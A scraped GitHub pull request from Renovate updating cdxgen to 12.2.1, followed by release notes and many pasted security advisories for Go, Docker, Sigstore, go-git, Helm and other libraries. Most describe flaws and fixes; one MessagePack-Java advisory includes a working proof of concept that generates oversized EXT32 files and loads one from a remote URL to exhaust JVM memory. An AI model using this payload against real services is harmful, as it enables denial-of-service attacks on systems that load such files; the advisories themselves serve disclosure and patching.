You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This release focuses on Node.js dependency accuracy, server-side submission hardening, and CI/build maintenance.
lang:node
#3920 added WASM and WASI detection in the JS analyzer with test coverage updates. #3924 fixed npm component deduplication to preserve lockfile hashes when combining minified JS and package-lock inputs. #3925 now sets cdx:npm:package:development=true for npm devDependencies, improving metadata fidelity for policy and filtering workflows.
server and submission integration
#3922 enhanced Dependency-Track BOM submit flow with configurable autoCreate and isLatest, plus strict parent mode validation across CLI and server paths. #3918 hardened gitClone handling against malicious hook execution scenarios in server contexts.
build and release tooling
#3919 removed dependency on table, reducing runtime dependency surface and simplifying display/reporting internals. #3911 updated CycloneDX spec version references across release-relevant configs and entry points (package.json, deno.json, pyproject.toml, bin/cdxgen.js, lib/cli/index.js).
compliance and compatibility
#3926 normalized object-form license data to CycloneDX-compliant fields in getLicenses.
What kind of vulnerability is it? Who is impacted?
It is an Authorization Bypass resulting from Improper Input Validation of the HTTP/2 :path pseudo-header.
The gRPC-Go server was too lenient in its routing logic, accepting requests where the :path omitted the mandatory leading slash (e.g., Service/Method instead of /Service/Method). While the server successfully routed these requests to the correct handler, authorization interceptors (including the official grpc/authz package) evaluated the raw, non-canonical path string. Consequently, "deny" rules defined using canonical paths (starting with /) failed to match the incoming request, allowing it to bypass the policy if a fallback "allow" rule was present.
Who is impacted?
This affects gRPC-Go servers that meet both of the following criteria:
They use path-based authorization interceptors, such as the official RBAC implementation in google.golang.org/grpc/authz or custom interceptors relying on info.FullMethod or grpc.Method(ctx).
Their security policy contains specific "deny" rules for canonical paths but allows other requests by default (a fallback "allow" rule).
The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed :path headers directly to the gRPC server.
Patches
Has the problem been patched? What versions should users upgrade to?
Yes, the issue has been patched. The fix ensures that any request with a :path that does not start with a leading slash is immediately rejected with a codes.Unimplemented error, preventing it from reaching authorization interceptors or handlers with a non-canonical path string.
Users should upgrade to the following versions (or newer):
v1.79.3
The latest master branch.
It is recommended that all users employing path-based authorization (especially grpc/authz) upgrade as soon as the patch is available in a tagged release.
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
While upgrading is the most secure and recommended path, users can mitigate the vulnerability using one of the following methods:
1. Use a Validating Interceptor (Recommended Mitigation)
Add an "outermost" interceptor to your server that validates the path before any other authorization logic runs:
funcpathValidationInterceptor(ctx context.Context, reqany, info*grpc.UnaryServerInfo, handler grpc.UnaryHandler) (any, error) {
ifinfo.FullMethod==""||info.FullMethod[0] !='/' {
returnnil, status.Errorf(codes.Unimplemented, "malformed method name")
}
returnhandler(ctx, req)
}
// Ensure this is the FIRST interceptor in your chains:=grpc.NewServer(
grpc.ChainUnaryInterceptor(pathValidationInterceptor, authzInterceptor),
)
2. Infrastructure-Level Normalization
If your gRPC server is behind a reverse proxy or load balancer (such as Envoy, NGINX, or an L7 Cloud Load Balancer), ensure it is configured to enforce strict HTTP/2 compliance for pseudo-headers and reject or normalize requests where the :path header does not start with a leading slash.
3. Policy Hardening
Switch to a "default deny" posture in your authorization policies (explicitly listing all allowed paths and denying everything else) to reduce the risk of bypasses via malformed inputs.
The fix for GHSA-9h8m-3fm2-qjrq (CVE-2026-24051) changed the Darwin ioreg command to use an absolute path but left the BSD kenv command using a bare name, allowing the same PATH hijacking attack on BSD and Solaris platforms.
The execCommand helper at sdk/resource/host_id_exec.go uses exec.Command(name, arg...) which searches $PATH when the command name contains no path separator.
Affected platforms (per build tag in host_id_bsd.go:4): DragonFly BSD, FreeBSD, NetBSD, OpenBSD, Solaris.
The kenv path is reached when /etc/hostid does not exist (line 38-40), which is common on FreeBSD systems.
Attack
Attacker has local access to a system running a Go application that imports go.opentelemetry.io/otel/sdk
Attacker places a malicious kenv binary earlier in $PATH
Application initializes OpenTelemetry resource detection at startup
hostIDReaderBSD.read() calls exec.Command("kenv", ...) which resolves to the malicious binary
Arbitrary code executes in the context of the application
The OpenTelemetry Go SDK in version v1.20.0-1.39.0 is vulnerable to Path Hijacking (Untrusted Search Paths) on macOS/Darwin systems. The resource detection code in sdk/resource/host_id.go executes the ioreg system command using a search path. An attacker with the ability to locally modify the PATH environment variable can achieve Arbitrary Code Execution (ACE) within the context of the application.
Patches
This has been patched in d45961b, which was released with v1.40.0.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected range
<0.28.1
Fixed version
0.28.1
CVSS Score
8.4
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score
0.055%
EPSS Percentile
17th percentile
Description
Impact
When using a custom BuildKit frontend, the frontend can craft an API message that causes files to be written outside of the BuildKit state directory for the execution context.
Patches
The issue has been fixed in v0.28.1+
Workarounds
Issue requires using an untrusted BuildKit frontend set with #syntax or --build-arg BUILDKIT_SYNTAX. Using these options with a well-known frontend image like docker/dockerfile is not affected.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Insufficient validation of Git URL fragment subdir components (<url>#<ref>:<subdir>, docs) may allow access to files outside the checked-out Git repository root. Possible access is limited to files on the same mounted filesystem.
Patches
The issue has been fixed in version v0.28.1
Workarounds
The issue affects only builds that use Git URLs with a subpath component. Avoid building Dockerfiles from untrusted sources or using the subdir component from an untrusted Git repository where the subdir component could point to a symlink.
Authentication Bypass Using an Alternate Path or Channel
Affected range
<29.3.1
Fixed version
Not Fixed
CVSS Score
8.8
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS Score
0.008%
EPSS Percentile
1st percentile
Description
Summary
A security vulnerability has been detected that allows attackers to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low.
If you don't use AuthZ plugins, you are not affected.
Using a specially-crafted API request, an attacker could make the Docker daemon forward the request to an authorization plugin without the body. The authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it.
Anyone who depends on authorization plugins that introspect the request body to make access control decisions is potentially impacted.
Workarounds
If unable to update immediately:
Avoid using AuthZ plugins that rely on request body inspection for security decisions.
Restrict access to the Docker API to trusted parties, following the principle of least privilege.
A security vulnerability has been detected that allows plugins privilege validation to be bypassed during docker plugin install. Due to an error in the daemon's privilege comparison logic, the daemon may incorrectly accept a privilege set that differs from the one approved by the user.
Plugins that request exactly one privilege are also affected, because no comparison is performed at all.
Impact
If plugins are not in use, there is no impact.
When a plugin is installed, the daemon computes the privileges required by the plugin's configuration and compares them with the privileges approved during installation. A malicious plugin can exploit this bug so that the daemon accepts privileges that differ from what was intended to be approved.
Anyone who depends on the plugin installation approval flow as a meaningful security boundary is potentially impacted.
Depending on the privilege set involved, this may include highly sensitive plugin permissions such as broad device access.
For consideration: exploitation still requires a plugin to be installed from a malicious source, and Docker plugins are relatively uncommon. Docker Desktop also does not support plugins.
Workarounds
If unable to update immediately:
Do not install plugins from untrusted sources
Carefully review all privileges requested during docker plugin install
Restrict access to the Docker daemon to trusted parties, following the principle of least privilege
Avoid relying on plugin privilege approval as the only control boundary for sensitive environments
Credits
Reported by Cody (c@wormhole.guru, PGP 0x9FA5B73E)
The SPDY/3 frame parser in spdystream does not validate
attacker-controlled counts and lengths before allocating memory. A
remote peer that can send SPDY frames to a service using spdystream can
cause the process to allocate gigabytes of memory with a small number of
malformed control frames, leading to an out-of-memory crash.
Three allocation paths in the receive side are affected:
SETTINGS entry count -- The SETTINGS frame reader reads a 32-bit numSettings from the payload and allocates a slice of that size
without checking it against the declared frame length. An attacker
can set numSettings to a value far exceeding the actual payload,
triggering a large allocation before any setting data is read.
Header count -- parseHeaderValueBlock reads a 32-bit numHeaders from the decompressed header block and allocates an http.Header map of that size with no upper bound.
Header field size -- Individual header name and value lengths are
read as 32-bit integers and used directly as allocation sizes with
no validation.
Because SPDY header blocks are zlib-compressed, a small on-the-wire
payload can decompress into attacker-controlled bytes that the parser
interprets as 32-bit counts and lengths. A single crafted frame is
enough to exhaust process memory.
Impact
Any program that accepts SPDY connections using spdystream -- directly
or through a dependent library -- is affected. A remote peer that can
send SPDY frames to the service can crash the process with a single
crafted SPDY control frame, causing denial of service.
v0.5.1 addresses the receive-side allocation bugs and adds related
hardening:
Core fixes:
SETTINGS entry-count validation -- The SETTINGS frame reader now
checks that numSettings is consistent with the declared frame
length (numSettings <= (length-4)/8) before allocating.
Header count limit -- parseHeaderValueBlock enforces a maximum
number of headers per frame (default: 1000).
Header field size limit -- Individual header name and value
lengths are checked against a per-field size limit (default: 1 MiB)
before allocation.
Connection closure on protocol error -- The connection read loop
now closes the underlying net.Conn when it encounters an InvalidControlFrame error, preventing further exploitation on the
same connection.
Additional hardening:
Write-side bounds checks -- All frame write methods now verify
that payloads fit within the 24-bit length field, preventing the
library from producing invalid frames.
Configurable limits:
Callers can adjust the defaults using NewConnectionWithOptions or
the lower-level spdy.NewFramerWithOptions with functional options: WithMaxControlFramePayloadSize, WithMaxHeaderFieldSize, and WithMaxHeaderCount.
Exposure of Sensitive Information to an Unauthorized Actor
Affected range
<1.8.6
Fixed version
1.8.6
CVSS Score
7.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS Score
0.015%
EPSS Percentile
3rd percentile
Description
HashiCorp's go-getter library up to v1.8.5 may allow arbitrary file reads on the file system during certain git operations through a maliciously crafted URL. This is fixed in go-getter v1.8.6. This vulnerability does not affect the go-getter/v2 branch and package.
Docker CLI for Windows searches for plugin binaries in C:\ProgramData\Docker\cli-plugins, a directory that does not exist by default. A low-privileged attacker can create this directory and place malicious CLI plugin binaries (docker-compose.exe, docker-buildx.exe, etc.) that are executed when a victim user opens Docker Desktop or invokes Docker CLI plugin features, and allow privilege-escalation if the docker CLI is executed as a privileged user.
This issue affects Docker CLI through v29.1.5 (fixed in v29.2.0). It impacts Windows binaries acting as a CLI plugin manager via the [github.com/docker/cli/cli-plugins/manager](https://pkg.go.dev/github.com/docker/cli@v29.1.5+incompatible/cli-plugins/manager) package, which is consumed by downstream projects such as Docker Compose.
Docker Compose became affected starting in v2.31.0, when it incorporated the relevant CLI plugin manager code (see docker/compose#12300), and is fixed in v5.1.0.
This issue does not impact non-Windows binaries or projects that do not use the plugin manager code.
Patches
Fixed version starts with 29.2.0
This issue was fixed in docker/cli@1375933 (docker/cli#6713), which removed %PROGRAMDATA%\Docker\cli-plugins from the list of paths used for plugin-discovery on Windows.
Function api.ParseJSONRequest currently splits (via a call to strings.Split) an optionally-provided OID (which is untrusted data) on periods. Similarly, function api.getContentType splits the Content-Type header (which is also untrusted data) on an application string.
As a result, in the face of a malicious request with either an excessively long OID in the payload containing many period characters or a malformed Content-Type header, a call to api.ParseJSONRequest or api.getContentType incurs allocations of O(n) bytes (where n stands for the length of the function's argument). Relevant weakness: CWE-405: Asymmetric Resource Consumption (Amplification)
Patches
Upgrade to v2.0.3.
Workarounds
There are no workarounds with the service itself. If the service is behind a load balancer, configure the load balancer to reject excessively large requests.
Decrypting a JSON Web Encryption (JWE) object will panic if the alg field indicates a key wrapping algorithm (one ending in KW, with the exception of A128GCMKW, A192GCMKW, and A256GCMKW) and the encrypted_key field is empty. The panic happens when cipher.KeyUnwrap() in key_wrap.go attempts to allocate a slice with a zero or negative length based on the length of the encrypted_key.
This code path is reachable from ParseEncrypted() / ParseEncryptedJSON() / ParseEncryptedCompact() followed by Decrypt() on the resulting object. Note that the parse functions take a list of accepted key algorithms. If the accepted key algorithms do not include any key wrapping algorithms, parsing will fail and the application will be unaffected.
This panic is also reachable by calling cipher.KeyUnwrap() directly with any ciphertext parameter less than 16 bytes long, but calling this function directly is less common.
Panics can lead to denial of service.
Fixed In
4.1.4 and v3.0.5
Workarounds
If the list of keyAlgorithms passed to ParseEncrypted() / ParseEncryptedJSON() / ParseEncryptedCompact() does not include key wrapping algorithms (those ending in KW), your application is unaffected.
If your application uses key wrapping, you can prevalidate to the JWE objects to ensure the encrypted_key field is nonempty. If your application accepts JWE Compact Serialization, apply that validation to the corresponding field of that serialization (the data between the first and second .).
Thanks
Thanks to Datadog's Security team for finding this issue.
A denial-of-service vulnerability exists in MessagePack for Java when deserializing .msgpack files containing EXT32 objects with attacker-controlled payload lengths. While MessagePack-Java parses extension headers lazily, it later trusts the declared EXT payload length when materializing the extension data. When ExtensionValue.getData() is invoked, the library attempts to allocate a byte array of the declared length without enforcing any upper bound. A malicious .msgpack file of only a few bytes can therefore trigger unbounded heap allocation, resulting in JVM heap exhaustion, process termination, or service unavailability. This vulnerability is triggered during model loading / deserialization, making it a model format vulnerability suitable for remote exploitation.
PoC
import msgpack
import struct
import os
OUTPUT_DIR = "bombs"
os.makedirs(OUTPUT_DIR, exist_ok=True)
# EXT format: fixext / ext8 / ext16 / ext32
# ext32 allows attacker-controlled length (uint32)
length = 1
step = 10_000_000
while True:
try:
# EXT32: 0xC9 | length (4 bytes) | type (1 byte)
header = b'\xC9' + struct.pack(">I", length) + b'\x01'
payload = b'A' # actual data tiny
data = header + payload
fname = f"{OUTPUT_DIR}/ext_length_{length}.msgpack"
with open(fname, "wb") as f:
f.write(data)
print(f"[+] Generated EXT bomb with declared length={length}")
length += step
except Exception as e:
print("[!] Stopped:", e)
break
// Main.java
import org.msgpack.core.MessagePack;
import org.msgpack.core.MessageUnpacker;
import org.msgpack.value.ExtensionValue;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Main {
public static void main(String[] args) throws Exception {
byte[] data = Files.readAllBytes(
Paths.get("ext_length_470000001.msgpack")
);
MessageUnpacker unpacker =
MessagePack.newDefaultUnpacker(data);
ExtensionValue ext =
unpacker.unpackValue().asExtensionValue();
// Vulnerability trigger:
byte[] payload = ext.getData();
System.out.println(payload.length);
}
}
Compile
javac -cp msgpack-core-0.9.8.jar Main.java
Run (with limited heap)
java -Xmx256m -cp .:msgpack-core-0.9.8.jar Main
Observed Result:
Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
at org.msgpack.core.MessageUnpacker.readPayload(...)
at org.msgpack.core.MessageUnpacker.unpackValue(...)
var u = new java.net.URL("https://huggingface.co/Blackbloodhacker/msgpack/resolve/main/ext_length_470000001.msgpack");
var d = u.openStream().readAllBytes();
var up = org.msgpack.core.MessagePack.newDefaultUnpacker(d);
up.unpackValue().asExtensionValue().getData();
Run:
java -Xmx256m -cp .:msgpack-core-0.9.8.jar Main
A remotely hosted model file on Hugging Face can cause denial of service when loaded by a Java-based consumer.
This vulnerability enables a remote denial-of-service attack against applications that deserialize untrusted .msgpack model files using MessagePack for Java. A specially crafted but syntactically valid .msgpack file containing an EXT32 object with an attacker-controlled, excessively large payload length can trigger unbounded memory allocation during deserialization. When the model file is loaded, the library trusts the declared length metadata and attempts to allocate a byte array of that size, leading to rapid heap exhaustion, excessive garbage collection, or immediate JVM termination with an OutOfMemoryError. The attack requires no malformed bytes, user interaction, or elevated privileges and can be exploited remotely in real-world environments such as model registries, inference services, CI/CD pipelines, and cloud-based model hosting platforms that accept or fetch .msgpack artifacts. Because the malicious file is extremely small yet valid, it can bypass basic validation and scanning mechanisms, resulting in complete service unavailability and potential cascading failures in production systems.
A vulnerability has been identified in which a maliciously crafted .idx file can cause asymmetric memory consumption, potentially exhausting available memory and resulting in a Denial of Service (DoS) condition.
Exploitation requires write access to the local repository's .git directory, it order to create or alter existing .idx files.
Patches
Users should upgrade to v5.17.1, or the latest v6pseudo-version, in order to mitigate this vulnerability.
Credit
The go-git maintainers thank @kq5y for finding and reporting this issue privately to the go-git project.
Insufficiently Protected Credentials
Affected range
<=5.17.2
Fixed version
5.18.0
CVSS Score
4.7
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
Description
Impact
go-git may leak HTTP authentication credentials when following redirects during smart-HTTP clone and fetch operations.
If a remote repository responds to the initial /info/refs request with a redirect to a different host, go-git updates the session endpoint to the redirected location and reuses the original authentication for subsequent requests. This can result in the credentials (e.g. Authorization headers) being sent to an unintended host.
An attacker controlling or influencing the redirect target can capture these credentials and potentially reuse them to access the victim’s repositories or other resources, depending on the scope of the credential.
Clients using go-git exclusively with trusted remotes (for example, GitHub or GitLab), and over a secure HTTPS connection, are not affected by this issue. The risk arises when interacting with untrusted or misconfigured Git servers, or when using unsecured HTTP connections, which is not recommended. Such configurations also expose clients to a broader class of security risks beyond this issue, including credential interception and tampering of repository data.
Patches
Users should upgrade to v5.18.0, or v6.0.0-alpha.2, in order to mitigate this vulnerability. Versions prior to v5 are likely to be affected, users are recommended to upgrade to a supported go-git version.
The patched versions add support for configuring followRedirects. In line with upstream behaviour, the default is now initial, while users can opt into FollowRedirects or NoFollowRedirects programmatically.
Credit
Thanks to the 3 separate reports from @celinke97, @N0zoM1z0 and @AyushParkara. Thanks for finding and reporting this issue privately to the go-git project. 🙇
Improper Validation of Integrity Check Value
Affected range
<=5.16.4
Fixed version
5.16.5
CVSS Score
4.3
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
EPSS Score
0.007%
EPSS Percentile
1st percentile
Description
Impact
A vulnerability was discovered in go-git whereby data integrity values for .pack and .idx files were not properly verified. This resulted in go-git potentially consuming corrupted files, which would likely result in unexpected errors such as object not found.
For context, clients fetch packfiles from upstream Git servers. Those files contain a checksum of their contents, so that clients can perform integrity checks before consuming it. The pack indexes (.idx) are generated locally by go-git, or the git cli, when new .pack files are received and processed. The integrity checks for both files were not being verified correctly.
Note that the lack of verification of the packfile checksum has no impact on the trust relationship between the client and server, which is enforced based on the protocol being used (e.g. TLS in the case of https:// or known hosts for ssh://). In other words, the packfile checksum verification does not provide any security benefits when connecting to a malicious or compromised Git server.
Patches
Users should upgrade to v5.16.5, or the latest v6pseudo-version, in order to mitigate this vulnerability.
Workarounds
In case updating to a fixed version of go-git is not possible, users can run git fsck from the git cli to check for data corruption on a given repository.
Credit
Thanks @N0zoM1z0 for finding and reporting this issue privately to the go-git project.
Improper Validation of Array Index
Affected range
<=5.17.0
Fixed version
5.17.1
CVSS Score
2.8
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L
EPSS Score
0.014%
EPSS Percentile
2nd percentile
Description
Impact
go-git’s index decoder for format version 4 fails to validate the path name prefix length before applying it to the previously decoded path name. A maliciously crafted index file can trigger an out-of-bounds slice operation, resulting in a runtime panic during normal index parsing.
This issue only affects Git index format version 4. Earlier formats (go-git supports only v2 and v3) are not vulnerable to this issue.
An attacker able to supply a crafted .git/index file can cause applications using go-git to panic while reading the index. If the application does not recover from panics, this results in process termination, leading to a denial-of-service (DoS) condition.
Exploitation requires the ability to modify or inject a Git index file within the local repository in disk. This typically implies write access to the .git directory.
Patches
Users should upgrade to v5.17.1, or the latest v6pseudo-version, in order to mitigate this vulnerability.
Credit
go-git maintainers thank @kq5y for finding and reporting this issue privately to the go-git project.
/api/v1/index/retrieve supports retrieving a public key via a user-provided URL, allowing attackers to trigger SSRF to arbitrary internal services.
Since the SSRF only can trigger GET requests, the request cannot mutate state. The response from the GET request is not returned to the caller so data exfiltration is not possible. A malicious actor could attempt to probe an internal network through Blind SSRF.
Impact
SSRF to cloud metadata (169.254.169.254)
SSRF to internal Kubernetes APIs
SSRF to any service accessible from Fulcio's network
Patches
Upgrade to v1.5.0. Note that this is a breaking change to the search API and fully disables lookups by URL. If you require this feature, please reach out and we can discuss alternatives.
Workarounds
Disable the search endpoint with --enable_retrieve_api=false.
NULL Pointer Dereference
Affected range
<=1.4.3
Fixed version
1.5.0
CVSS Score
5.3
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
EPSS Score
0.016%
EPSS Percentile
4th percentile
Description
Summary
Rekor’s cose v0.0.1 entry implementation can panic on attacker-controlled input when canonicalizing a proposed entry with an empty spec.message. validate() returns nil (success) when message is empty, leaving sign1Msg uninitialized, and Canonicalize() later dereferences v.sign1Msg.Payload.
Impact
A malformed proposed entry of the cose/v0.0.1 type can cause a panic on a thread within the Rekor process. The thread is recovered so the client receives a 500 error message and service still continues, so the availability impact of this is minimal.
A Cosign bundle can be crafted to successfully verify an artifact even if the embedded Rekor entry does not reference the artifact's digest, signature or public key. When verifying a Rekor entry, Cosign verifies the Rekor entry signature, and also compares the artifact's digest, the user's public key from either a Fulcio certificate or provided by the user, and the artifact signature to the Rekor entry contents. Without these comparisons, Cosign would accept any response from Rekor as valid. A malicious actor that has compromised a user's identity or signing key could construct a valid Cosign bundle by including any arbitrary Rekor entry, thus preventing the user from being able to audit the signing event.
This vulnerability only affects users that provide a trusted root via --trusted-root or when fetched automatically from a TUF repository, when no trusted key material is provided via SIGSTORE_REKOR_PUBLIC_KEY. When using the default flag values in Cosign v3 to sign and verify (--use-signing-config=true and --new-bundle-format=true for signing, --new-bundle-format=true for verification), users are unaffected. Cosign v2 users are affected using the default flag values.
This issue had previously been fixed in GHSA-8gw7-4j42-w388 but recent refactoring caused a regression. We have added testing to prevent a future regression.
Upgrade to Cosign v2.6.2 or Cosign v3.0.4. This does not affect Cosign v1.
Workarounds
You can provide trusted key material via a set of flags under certain conditions. The simplest fix is to upgrade to the latest Cosign v2 or v3 release.
Note that the example below works for cosign verify, cosign verify-blob, cosign verify-blob-attestation, and cosign verify-attestation`.
SIGSTORE_REKOR_PUBLIC_KEY=<path to Rekor pub key> cosign verify-blob --use-signing-config=false --new-bundle-format=false --bundle=<path to bundle> <artifact>
uuid13.0.0 (npm)
pkg:npm/uuid@13.0.0
Improper Validation of Specified Index, Position, or Offset in Input
v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset).
By contrast, v4, v1, and v7 explicitly throw RangeError on invalid bounds.
This inconsistency allows silent partial writes into caller-provided buffers.
Affected code
src/v35.ts (v3/v5 path) writes buf[offset + i] without bounds validation.
src/v6.ts writes buf[offset + i] without bounds validation.
Reproducible PoC
cd /home/StrawHat/uuid
npm ci
npm run build
node --input-type=module -e "import {v4,v5,v6} from './dist-node/index.js';const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';for (const [name,fn] of [ ['v4',()=>v4({},new Uint8Array(8),4)], ['v5',()=>v5('x',ns,new Uint8Array(8),4)], ['v6',()=>v6({},new Uint8Array(8),4)],]) { try { fn(); console.log(name,'NO_THROW'); } catch(e){ console.log(name,'THREW',e.name); }}"
Observed:
v4 THREW RangeError
v5 NO_THROW
v6 NO_THROW
Example partial overwrite evidence captured during audit:
An issue exists in the the EventStream header decoder in AWS SDK for Go v2 in versions predating 2026-03-23. An actor can send a malformed EventStream response frame containing a crafted header value type byte outside the valid range, which can cause the host process to terminate.
This issue has been addressed in versions 2026-03-23 and above. We recommend upgrading to the latest version and ensuring any forked or derivative code is patched to incorporate the new fixes.
Workarounds
Not Applicable
References
If you have any questions or comments about this advisory, we ask that you contact [AWS/Amazon] Security via our vulnerability reporting page or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.
An issue exists in the the EventStream header decoder in AWS SDK for Go v2 in versions predating 2026-03-23. An actor can send a malformed EventStream response frame containing a crafted header value type byte outside the valid range, which can cause the host process to terminate.
This issue has been addressed in versions 2026-03-23 and above. We recommend upgrading to the latest version and ensuring any forked or derivative code is patched to incorporate the new fixes.
Workarounds
Not Applicable
References
If you have any questions or comments about this advisory, we ask that you contact [AWS/Amazon] Security via our vulnerability reporting page or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.
helm.sh/helm/v33.19.2 (golang)
pkg:golang/helm.sh/helm/v3@3.19.2
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Helm is a package manager for Charts for Kubernetes. In Helm versions <=3.20.1 and <=4.1.3, a specially crafted Chart will cause helm pull --untar [chart URL | repo/chartname] to write the Chart's contents to the immediate output directory (as defaulted to the current working directory; or as given by the --destination and --untardir flags), rather than the expected output directory suffixed by the chart's name.
Impact
The bug enables writing the Chart's contents (unpackaged/untar'ed) to the output directory <output dir>/, instead of the expected <output dir>/<chart name>/, potentially overwriting the contents of the targeted directory.
Note: a chart name containing POSIX dot-dot, or dot-dot and slashes (as if to refer to parent directories) do not resolve beyond the output directory as designed.
Patches
This issue has been resolved in Helm v3.20.2 and v4.1.3
A Chart with an unexpected name (those specified to be "." or ".."), or a Chart name which results in a non-unique directory will be rejected.
Workarounds
Ensure the the name of the Chart does not comprise/contain POSIX pathname special directory references ie. dot-dot ("..") or dot ("."). In addition, ensuring that the pull --untar flag (or equivalent SDK option) refers to a unique/empty output directory prevents chart extraction from inadvertently overwriting existing files within the specified directory.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Affected range
<=1.10.3
Fixed version
1.10.4
CVSS Score
5.8
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N
EPSS Score
0.015%
EPSS Percentile
3rd percentile
Description
Summary
The legacy TUF client pkg/tuf/client.go, which supports caching target files to disk, constructs a filesystem path by joining a cache base directory with a target name sourced from signed target metadata, but it does not validate that the resulting path stays within the cache base directory.
Note that this should only affect clients that are directly using the TUF client in sigstore/sigstore or are using an older version of Cosign. As this TUF client implementation is deprecated, users should migrate to https://github.com/sigstore/sigstore-go/tree/main/pkg/tuf as soon as possible.
Note that this does not affect users of the public Sigstore deployment, where TUF metadata is validated by a quorum of trusted collaborators.
Impact
A malicious TUF repository can trigger arbitrary file overwriting, limited to the permissions that the calling process has.
The CombinedMult function in the CIRCL ecc/p384 package (secp384r1 curve) produces an incorrect value for specific inputs. The issue is fixed by using complete addition formulas.
ECDH and ECDSA signing relying on this curve are not affected.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
12.2.0→12.2.1Warning
Some dependencies could not be looked up. Check the Dependency Dashboard for more information.
Release Notes
cdxgen/cdxgen (cdxgen)
v12.2.1Compare Source
This release focuses on Node.js dependency accuracy, server-side submission hardening, and CI/build maintenance.
lang:node
#3920 added WASM and WASI detection in the JS analyzer with test coverage updates.
#3924 fixed npm component deduplication to preserve lockfile hashes when combining minified JS and package-lock inputs.
#3925 now sets
cdx:npm:package:development=truefor npm devDependencies, improving metadata fidelity for policy and filtering workflows.server and submission integration
#3922 enhanced Dependency-Track BOM submit flow with configurable
autoCreateandisLatest, plus strict parent mode validation across CLI and server paths.#3918 hardened gitClone handling against malicious hook execution scenarios in server contexts.
build and release tooling
#3919 removed dependency on
table, reducing runtime dependency surface and simplifying display/reporting internals.#3911 updated CycloneDX spec version references across release-relevant configs and entry points (package.json, deno.json, pyproject.toml, bin/cdxgen.js, lib/cli/index.js).
compliance and compatibility
#3926 normalized object-form license data to CycloneDX-compliant fields in getLicenses.
Full Changelog: cdxgen/cdxgen@v12.2.0...v12.2.1
Configuration
📅 Schedule: (in timezone Europe/Berlin)
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR has been generated by Mend Renovate.